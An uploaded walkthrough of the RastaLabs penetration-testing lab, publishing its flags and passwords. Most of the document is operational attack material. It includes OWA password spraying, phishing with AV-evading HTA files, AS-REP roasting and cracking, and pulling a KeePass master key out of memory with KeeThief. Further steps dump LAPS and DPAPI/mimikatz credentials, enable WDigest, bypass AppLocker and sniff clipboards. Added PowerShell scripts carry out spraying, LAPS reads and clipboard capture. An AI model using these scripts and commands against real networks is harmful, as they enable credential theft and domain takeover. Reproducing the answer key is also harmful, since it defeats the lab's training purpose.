rasta

Uploaded by mipiso9067

# 10.10.110.254 OWA

Google rastalabs LinkedIn and find Amber Hope.

Use MailSniper to validate that ahope is a valid username on rastalabs.local.
Use MailSniper to spray passwords and discover her password is Summer2020.
Flag is on the Tasks tab after logging in to OWA.
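Added example (my code, not from the original notes): turn the names harvested from LinkedIn into username candidates, then drive MailSniper's OWA harvest and spray. MailSniper's cmdlet names and parameters are the ones in its README; the OWA host and domain are the ones in the notes, and the name list is constructed (only Amber Hope appears in the notes). Check the domain lockout threshold before spraying; one password per round across all users is the safe pattern.

```powershell
# Added example, not from the original notes. Assumes MailSniper.ps1 is in the
# current directory and that 10.10.110.254 / rastalabs.local are the OWA target.
Import-Module .\MailSniper.ps1

$owaHost = '10.10.110.254'
$domain  = 'rastalabs.local'

# Names recovered from LinkedIn (constructed list; only Amber Hope is in the notes).
$people = @(
    @{ First = 'Amber'; Last = 'Hope' }
)

# Common corporate username formats; the lab turned out to use <first initial><last>.
function Get-UsernameCandidates {
    param([string]$First, [string]$Last)
    $f = $First.ToLower(); $l = $Last.ToLower()
    @(
        "$($f[0])$l",        # ahope
        "$f.$l",             # amber.hope
        "$f$l",              # amberhope
        "$l$($f[0])",        # hopea
        "$f"                 # amber
    ) | Select-Object -Unique
}

$candidates = foreach ($p in $people) { Get-UsernameCandidates -First $p.First -Last $p.Last }
$candidates | Set-Content -Path .\users.txt

# Timing-based enumeration of valid accounts against the OWA login form.
Invoke-UsernameHarvestOWA -ExchHostname $owaHost -Domain $domain -UserList .\users.txt -OutFile .\valid.txt -Threads 5

# Spray a single password across the validated users. Stay under the lockout
# threshold (commonly 5 attempts) per round; seasonal passwords are the first guess.
Invoke-PasswordSprayOWA -ExchHostname $owaHost -Domain $domain -UserList .\valid.txt -Password 'Summer2020' -Threads 5 -OutFile .\sprayed.txt
```

Valid usernames land in valid.txt and successful logins in sprayed.txt; wait out the lockout observation window before the next password round.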

# Infrastructure Note

Your payloads must bypass Windows Defender with definitions from 4 May 2020.


You can use https://github.com/felamos/weirdhta or
https://rastamouse.me/2019/08/covenant-donut-tikitorch/
You don't need TikiTorch; standard shellcode loaders work fine with donut.
https://uknowsec.cn/posts/notes/shellcode%E5%8A%A0%E8%BD%BD%E6%80%BB%E7%BB%93.html (shellcode loader write-up, in Chinese)
Chisel is a great tool for establishing a reverse SOCKS proxy pivot:
https://github.com/jpillora/chisel
Build a local VM and test your payloads before wasting time in the lab.

# 10.10.123.101 WS04 (bowen)

Email bowen a hyperlink to your AV-bypassing .hta file.

Wait about 5 min for the AutoIt bot (phisherman) to click on it.
Flag is in M:\Desktop
Flag is in \\fs01\finance\flag.txt
key.txt is in M:\Desktop\$RECYCLE.BIN\

# 10.10.123.108 WS06 (tquinn)

Email tquinn a hyperlink to your AV-bypassing .hta file; use a Subject and Message like "HR Policy Document".
Wait about 5 min for the AutoIt bot to click on it.
Flag is in M:\Desktop\flag.txt.txt

# 10.10.122.20 (nix01)

From ws04, grab ahope's PuTTY key from her home share:
net use I: \\10.10.120.5\home$\ahope /user:ahope "Summer2020"
type I:\Desktop\nix01.ppk
net use I: /delete
puttygen nix01.ppk -O private-openssh -o nix
Set up a SOCKS pivot on ws04 with chisel, then pull the target binary and forward the service port:
proxychains scp -i nix <user>@10.10.122.20:/usr/bin/paycalc .
proxychains ssh -i nix -L1234:127.0.0.1:1234 <user>@10.10.122.20
netcat 127.0.0.1 1234 reaches paycalc running as root.
Use pwntools to build a ROP chain that calls mprotect and then jumps to shellcode placed in an overtime note (see shell.py).

# 10.10.123.102 (ws05)
From ws04, run Rubeus asreproast through Covenant to get an AS-REP hash for ngodfrey.
The password is a keyboard walk; generate a keyboard-walk wordlist with kwprocessor and crack the hash with john to zaq123$%^&*()_+:
./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt
john hash.txt --wordlist=kwp3.txt

Mount ngodfrey's share:

net use I: \\10.10.120.5\home$\ngodfrey /user:ngodfrey "zaq123$%^&*()_+"
type I:\Desktop\flag.txt
net use I: /delete
Download Passwords.kdbx and Passwords-Key.key.

Log in to OWA as ngodfrey to find a pcap from rweston; use NetworkMiner to extract the secret file.
Rename the file secret.AES.
There's a key.txt in bowen's recycle bin on ws04 (M:\Desktop\$RECYCLE.BIN\).
bowen has a Protect-String module imported.
Use FileCryptography.psm1 on ws04, running as bowen, to decrypt the flag (key.txt is a protected string that only converts back in bowen's user context, so the ConvertTo-SecureString step has to run as him):
https://gallery.technet.microsoft.com/scriptcenter/EncryptDecrypt-files-use-65e7ae5d
$key = Get-Content key.txt | ConvertTo-SecureString -Force
Unprotect-File '.\secret.AES' -Algorithm AES -Key $key

# 10.10.123.102
proxychains evil-winrm -i 10.10.123.102 -u ngodfrey

Every 1-30 min the KeePass database is unlocked; steal the master key from memory with KeeThief.
Stage KeeThief and the polling script on the box, then run it:
iwr -uri http://10.10.14.2/KeeThief.ps1 -outfile k.ps1
iwr -uri http://10.10.14.2/grab.ps1 -outfile grab.ps1
powershell -executionpolicy bypass -File .\grab.ps1

grab.ps1 waits for KeePass.exe to appear (it only runs while the database is open) and then dumps the key:
while ($true)
{
    if (Get-Process -Name KeePass -ErrorAction SilentlyContinue)
    {
        Import-Module .\k.ps1
        # KeeThief reads the composite key material out of the KeePass process memory
        Get-Process KeePass | Get-KeePassDatabaseKey -Verbose
        # back off so the key is not dumped again on every iteration while KeePass stays open
        Start-Sleep -Seconds 1000
    }
    else
    {
        Start-Sleep -Seconds 5
    }
}

The recovered master password is 1234567890qwertyuiopasdfghjklzxcvbnm!"£$%^&*() (the £ is the UK pound sign); use it together with the database and key file to open Passwords.kdbx and get:

ngodfrey_adm:J5KCwKruINyCJBKd1dZU
Inside the KeePass database is a Recycling Bin folder with a flag.

ngodfrey_adm has read access to the LAPS local administrator passwords of ws01-ws06.

You can dump those passwords with PowerView from the Covenant grunt (old Get-ADObject syntax; ms-Mcs-AdmPwd holds the cleartext):

powershellimport (upload PowerView.ps1)
powershell $pass = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential('rlab\ngodfrey_adm', $pass); 'ws01','ws02','ws03','ws04','ws05','ws06' | ForEach-Object { Get-ADObject -Name $_ -Credential $cred | select name, ms-mcs-admpwd }
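Added example (my code, not from the original notes): the same LAPS read done with plain .NET ADSI under ngodfrey_adm's credentials, so it needs no PowerView on disk and also returns the password expiration, which the one-liner above does not show. Assumptions: the DC is 10.10.120.1 (DC01 in the notes), the domain is rastalabs.local, and the credential is the one recovered from the KeePass database.

```powershell
# Added example, not from the original notes. Assumes DC01 = 10.10.120.1 and the
# rastalabs.local domain; the credential is the one from Passwords.kdbx.
$dc       = '10.10.120.1'
$baseDn   = 'DC=rastalabs,DC=local'
$user     = 'rastalabs.local\ngodfrey_adm'
$password = 'J5KCwKruINyCJBKd1dZU'
$hosts    = 'ws01','ws02','ws03','ws04','ws05','ws06'

function Get-LapsPassword {
    param([string]$ComputerName)

    # Bind as the delegated reader. ms-Mcs-AdmPwd is a confidential attribute and is
    # only returned to principals granted read rights on it (the LAPS reader ACL).
    $root     = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$dc/$baseDn", $user, $password)
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    $searcher.Filter = "(&(objectCategory=computer)(name=$ComputerName))"
    $null = $searcher.PropertiesToLoad.AddRange(@('name', 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'))

    $result = $searcher.FindOne()
    if (-not $result) {
        return [pscustomobject]@{ Host = $ComputerName; Password = $null; Expires = 'object not found' }
    }

    # DirectorySearcher hands back LDAP attribute names lower-cased.
    $admPwd = $result.Properties['ms-mcs-admpwd'] | Select-Object -First 1
    $expRaw = $result.Properties['ms-mcs-admpwdexpirationtime'] | Select-Object -First 1

    # Expiration is a Windows FILETIME (100 ns ticks since 1601) stored as a large integer.
    $expires = $null
    if ($expRaw) { $expires = [datetime]::FromFileTimeUtc([int64]$expRaw) }

    # Object found but no password returned means the bind account has no read right on that host.
    $shown = if ($admPwd) { $admPwd } else { '<no read access>' }

    [pscustomobject]@{ Host = $ComputerName; Password = $shown; Expires = $expires }
}

$hosts | ForEach-Object { Get-LapsPassword -ComputerName $_ } | Format-Table -AutoSize
```

An expiration in the past means the client will rotate the password the next time its LAPS policy runs, so use that password promptly; a far-future expiration means the value you read stays valid.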

Log in to ws04 and ws05 with the LAPS local administrator passwords:
proxychains evil-winrm -i 10.10.123.101 -u administrator
type C:\Users\Administrator\Desktop\flag.txt
proxychains evil-winrm -i 10.10.123.102 -u administrator
type C:\users\administrator\Desktop\flag.txt
# 10.10.121.108 Slacking Off (ws06)
tquinn on ws06 is running Slack.
proxychains evil-winrm -i 10.10.121.108 -u administrator
Inside the AppData folder, search for RASTA{
You'll find the flag in C:\users\tquinn\appdata\Roaming\Slack\IndexedDB\https_app.slack.com_0.indexeddb.leveldb\000003.log
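Added example (my code, not from the original notes): a binary-safe search of the Slack profile for the flag pattern. Electron/Chromium IndexedDB data lives in LevelDB .log/.ldb files, which are binary and may hold strings as either 8-bit or UTF-16LE, so this scans both views and reports byte offsets. Assumptions: run as local admin on ws06; the profile path is the one in the notes.

```powershell
# Added example, not from the original notes. Assumes local admin on ws06 and the
# Slack profile path reported in the notes.
function Find-SecretInFiles {
    param(
        [string]$Root    = 'C:\Users\tquinn\AppData\Roaming\Slack',
        [string]$Pattern = 'RASTA\{[^}]{1,128}\}'
    )
    $files = Get-ChildItem -Path $Root -Recurse -File -ErrorAction SilentlyContinue
    foreach ($f in $files) {
        $bytes = [System.IO.File]::ReadAllBytes($f.FullName)

        # Latin-1 maps every byte to exactly one char, so string offsets equal byte offsets
        # and 8-bit strings embedded in binary records are found intact.
        $narrow = [System.Text.Encoding]::GetEncoding(28591).GetString($bytes)
        foreach ($m in [regex]::Matches($narrow, $Pattern)) {
            [pscustomobject]@{ File = $f.FullName; Offset = $m.Index; Encoding = 'latin1'; Match = $m.Value }
        }

        # Same search over the UTF-16LE view; the offset is converted back to bytes.
        $wide = [System.Text.Encoding]::Unicode.GetString($bytes)
        foreach ($m in [regex]::Matches($wide, $Pattern)) {
            [pscustomobject]@{ File = $f.FullName; Offset = $m.Index * 2; Encoding = 'utf-16le'; Match = $m.Value }
        }
    }
}

Find-SecretInFiles | Format-Table -AutoSize
```

The same function works for any other Electron app data directory (Teams, Discord, VS Code) by changing -Root and -Pattern; those stores are rarely encrypted at rest.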

# 10.10.121.107 WS02 (epugh)

proxychains evil-winrm -i 10.10.121.107 -u administrator
type C:\users\administrator\Desktop\flag.txt

Download and run a Covenant grunt.

SafetyKatz: the flag user has a key as its password.
epugh's hash cracks on hashes.com to Sarah2017 (it's also in LSA secrets).

# 10.10.120.20 web01
proxychains ssh -L1234:127.0.0.1:80 <user>@10.10.120.20
sudo su to get root; nothing else on the box.
Basic markdown website with the LinkedIn users.

# 10.10.120.15 srv01
proxychains xfreerdp /v:10.10.120.15 /u:epugh /p:Sarah2017
The user is a local admin; copy a binary to C:\Windows\Tasks and run it to bypass AppLocker (that directory is user-writable yet covered by the default %WINDIR% allow rule).
From RDP, take ownership of C:\users\administrator\Desktop\flag.txt and give yourself read access.

# Multiple
Use mimikatz to get cleartext creds from LSA secrets on each workstation:
ws02:epugh:Sarah2017
ws03:ahope:Summer2020
ws04:bowen:NovakDjokovic001
ws05:ngodfrey:zaq123$%^&*()_+
ws06:tquinn:Telford1

Dump epugh_adm's password from the Credential Manager vault on ws02 (Covenant grunt):

getsystem
mimikatz sekurlsa::dpapi
mimikatz "sekurlsa::pth /user:epugh /domain:rastalabs.local /ntlm:326457b72c3f136d80d99bdbb935d109"
impersonateprocess (the process spawned by pth above)
mimikatz "dpapi::masterkey /in:C:\Users\epugh\AppData\Roaming\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\7dc6a492-36e2-4c2d-be66-ba29d263dda2"
mimikatz "dpapi::masterkey /in:C:\Users\epugh\AppData\Roaming\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\7dc6a492-36e2-4c2d-be66-ba29d263dda2 /rpc"
(/rpc asks the DC to unwrap the masterkey with the domain backup key, which is why it has to run as epugh)
getsystem
mimikatz "dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:dcd70638e50e3bcec7cd7fb888399748fea41f9bb137a72a13c98e30ee64469e27a03083256e51f04051a427da9b8c34520fad6c8a486c3f6043ea959026670c"
epugh_adm:IReallyH8LongPasswords\!

The old path to DC01 (find an editable GPO on fs01 as epugh_adm, then forge a golden ticket as rweston_da) no longer works.

Enable WDigest so LSASS keeps cleartext creds on every box you have admin over (/f skips the overwrite prompt, which would hang a non-interactive shell):
shellcmd reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Wait for someone to log in with rweston_da's creds, then dump them with mimikatz (sekurlsa::wdigest):
W0lv3rh@mpt0n!!

# 10.10.120.1 (DC01)
Log in as rweston_da with smbexec.
Set up a reverse proxy pivot.
Log in with RDP.
Edit the domain group policy to enable RDP everywhere and open the firewall port.
Flag on the desktop.
Flag in the event logs:
Get-EventLog -LogName "Application" | where {$_.Message -like '*RASTA*'} | select Message | format-table -wrap

# 10.10.122.15 (sql01)
Log in as rweston_da with evil-winrm.
Set up a reverse proxy pivot.
Log in as epugh_adm via RDP.
Flag on the desktop.
Open MS SQL Management Studio; the flag is in the flag table of the umbraco database.

# 10.10.122.5 (fs01)
Log in as rweston_da with evil-winrm.
Set up a reverse proxy pivot.
Log in with RDP.
Flag is on the administrator's desktop; take ownership and add read rights.

# 10.10.120.10 (mx01)
Log in with rweston_da.
No flags.

# 10.10.121.106 (ws01 rweston)

Log in as rweston_da with evil-winrm.
In the Startup folder you'll find a script that logs into http://10.10.122.254, pasting its password from the clipboard.
Monitor the clipboard to catch it: rweston:BullyBully
Log in there to get the flag in the description field.
rweston also has a decryptable stored credential containing rweston_da's cleartext password.
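Added example (my code, not from the original notes): a clipboard poller that logs every change with a timestamp, so a value that is only on the clipboard for a moment still gets captured. Assumption: it runs inside rweston's own logon session (clipboard contents are per window station, so a WinRM or other non-interactive shell sees a different, empty clipboard); how you get code into that session is not covered here. The target URL and the BullyBully value are what the notes report; the script does not perform the login.

```powershell
# Added example, not from the original notes. Must run in the interactive session
# whose clipboard you want (clipboard data does not cross window stations).
param(
    [int]$PollMs     = 250,
    [int]$TimeoutSec = 1800,
    [string]$LogPath = "$env:TEMP\clip.log"
)

function Watch-Clipboard {
    param([int]$PollMs, [int]$TimeoutSec, [string]$LogPath)
    $deadline = (Get-Date).AddSeconds($TimeoutSec)
    $last = $null
    while ((Get-Date) -lt $deadline) {
        # Get-Clipboard (PowerShell 5+) returns the text content; -Raw keeps multi-line values whole.
        $current = Get-Clipboard -Raw -ErrorAction SilentlyContinue
        if ($current -and $current -ne $last) {
            # Log only transitions, with an ISO timestamp, so the sequence copy -> paste -> clear is visible.
            $entry = "{0:o} len={1} value={2}" -f (Get-Date), $current.Length, $current
            Add-Content -Path $LogPath -Value $entry
            Write-Host $entry
            $last = $current
        }
        Start-Sleep -Milliseconds $PollMs
    }
}

Watch-Clipboard -PollMs $PollMs -TimeoutSec $TimeoutSec -LogPath $LogPath
```

A 250 ms poll can miss a value that a script sets and clears in one go; tighten -PollMs if the log shows the paste happening without a captured value.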

# Flags
RASTA{ph15h1n6_15_h4rdc0r3}
RASTA{w007_f007h0ld_l375_pwn}
RASTA{ju1cy_1nf0_1n_0p3n_5h4r35}
RASTA{br4v3_n3w_w0rld}
RASTA{k3rb3r05_15_7r1cky}
RASTA{50m371m35_y0u_mu57_b4ck7r4ck}
RASTA{3v3ryb0dy_l0v35_l4p5}
RASTA{53rv1c3_4bu53_f7w}
RASTA{wh3r3_w45_2f4_!?}
RASTA{n07h1n6_15_54f3}
RASTA{4ppl0ck32_5uck5}
RASTA{c00k1n6_w17h_645_n0w}
RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}
RASTA{6p0_4bu53_15_h4rdc0r3}
RASTA{r4574l4b5_ch4mp10n}
RASTA{1nc1d3n7_r35p0nd3r5_l0v3_l065}
RASTA{y0ur3_4_b4ll3r_70_637_7h15}
RASTA{cryp70_3xf1l7r4710n}
RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}
RASTA{937_84ck_70_w02k}
